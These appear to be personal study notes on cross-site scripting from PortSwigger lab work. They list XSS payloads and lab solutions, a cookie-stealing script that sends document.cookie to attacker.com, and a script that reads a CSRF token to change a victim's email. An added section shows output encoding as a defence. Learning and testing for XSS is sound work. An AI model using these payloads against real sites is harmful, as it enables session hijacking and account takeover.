Cross-site scripting (XSS)
Cross-site scripting (XSS) cheat sheet | PortSwigger
When and where to test for XSS?
- URL patterns like /?search=xxxx, for example:
https://example.com/?search=<script>alert(1)</script>
- All input areas
The significant effects XSS can cause
Session Hijacking and Credential Theft
<script>
fetch('http://attacker.com/steal?cookie=' + document.cookie);
</script>
The attacker receives the session token and uses it to impersonate the victim by including the stolen cookie in their HTTP requests to the web application.
Unauthorized Access: The attacker gains access to the victim’s account, potentially viewing sensitive information, performing transactions, or changing account settings.
Sample XSS payloads to check
"><script>alert(1)</script>
"><img src=x onerror=alert(1) >
"><svg onload=alert('XSS')>
payloads
/product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>
// AngularJS expression
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
// Reflected DOM XSS
// {"searchTerm":"\\"-alert(1)}//", "results":[]}
\"-alert(1)}//
// replace() bypass
<><img src=1 onerror=alert(1)>
//?search="><body onresize=print()>" onload=this.style.width='100px'>
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
// ?search=<xss id=x onfocus=alert(document.cookie) tabindex=1>#x';
<script>
location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>
// ?search="><svg><animatetransform onbegin=alert(1)>
https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E
// /?'accesskey='x'onclick='alert(1)
https://YOUR-LAB-ID.web-security-academy.net/?%27accesskey=%27x%27onclick=%27alert(1)
To trigger the exploit on yourself, press one of the following key combinations:
On Windows: ALT+SHIFT+X
On macOS: CTRL+ALT+X
On Linux: Alt+X
</script><script>alert(1)</script>
\'-alert(1)//
http://foo?'-alert(1)-'
${alert(1)}
${4*4}
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/my-account/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com');
}
</script>
Lab: DOM XSS in document.write sink using source location.search
<script>
function trackSearch(query) {
document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
trackSearch(query);
}
</script>
Solution:
Break out of the img src attribute by searching for:
"><svg onload=alert(1)>
Lab: DOM XSS in innerHTML sink using source location.search
<script>
function doSearchQuery(query) {
document.getElementById('searchMessage').innerHTML = query;
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
doSearchQuery(query);
}
</script>
Solution:
Enter the following into the search box:
<img src=1 onerror=alert(1)/>
Lab: Reflected XSS into attribute with angle brackets HTML-encoded
<form action=/ method=GET>
<input type=text placeholder='Search the blog...' name=search value="pet">
<button type=submit class=button>Search</button>
</form>
Solution:
Change the value of the search parameter so that the reflected attribute becomes:
value=""onmouseover="alert(1)"
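The two sinks above (the tracker.gif URL built by document.write, and the search value reflected into an attribute) fail for the same reason: the input is concatenated into a double-quoted attribute without encoding for that context. The following is an added example, not code from these notes or from PortSwigger; it rebuilds both sinks with context-aware encoding and adds a small check a unit test could run, using the lab payloads above as constructed inputs. Function names are assumed.

```javascript
// Added example (not from these notes or PortSwigger): the two lab sinks above,
// rebuilt with context-aware output encoding. All function names are assumed.

// Context 1: user input lands in a URL query parameter that is itself inside a
// double-quoted attribute. Encode for the URL first, then for the attribute
// (encodeURIComponent leaves ' and & alone; the second pass covers them).
function encodeForUrlParam(value) {
  return encodeURIComponent(String(value));
}

// Context 2: user input reflected straight into a double-quoted attribute.
function encodeForHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '`': '&#x60;' };
  return String(value).replace(/[&<>"'`]/g, (ch) => map[ch]);
}

// trackSearch() from the document.write lab, as written (vulnerable) and hardened.
// Both return the markup instead of calling document.write so they run outside a browser.
function vulnerableTrackerImg(query) {
  return '<img src="/resources/images/tracker.gif?searchTerms=' + query + '">';
}
function safeTrackerImg(query) {
  const param = encodeForHtmlAttr(encodeForUrlParam(query));
  return '<img src="/resources/images/tracker.gif?searchTerms=' + param + '">';
}

// The reflected search input from the attribute lab, as written and hardened.
function vulnerableSearchInput(value) {
  return "<input type=text placeholder='Search the blog...' name=search value=\"" + value + '">';
}
function safeSearchInput(value) {
  return "<input type=text placeholder='Search the blog...' name=search value=\"" + encodeForHtmlAttr(value) + '">';
}

// Coarse check for a unit test. Both templates contain exactly one tag and one
// double-quoted attribute, so any extra tag or raw " means the input escaped its context.
function breaksOut(html) {
  const tags = (html.match(/<[a-z]/gi) || []).length;
  const quotes = (html.match(/"/g) || []).length;
  return tags !== 1 || quotes !== 2;
}

// Constructed inputs: the payloads the notes use for these two labs, plus a benign one.
const SAMPLES = ['"><svg onload=alert(1)>', '"onmouseover="alert(1)"', 'pet'];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'tracker escapes:', breaksOut(vulnerableTrackerImg(s)), '-> hardened:', breaksOut(safeTrackerImg(s)));
  console.log(JSON.stringify(s), 'search  escapes:', breaksOut(vulnerableSearchInput(s)), '-> hardened:', breaksOut(safeSearchInput(s)));
}
```

In a real page the hardened innerHTML lab would instead assign to textContent or build the element with DOM APIs; the encoders here cover the two string-building sinks only.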
Need to watch the explanations of the following labs:
Lab: DOM XSS in jQuery selector sink using a hashchange event
Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded
Lab: DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded
Input:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}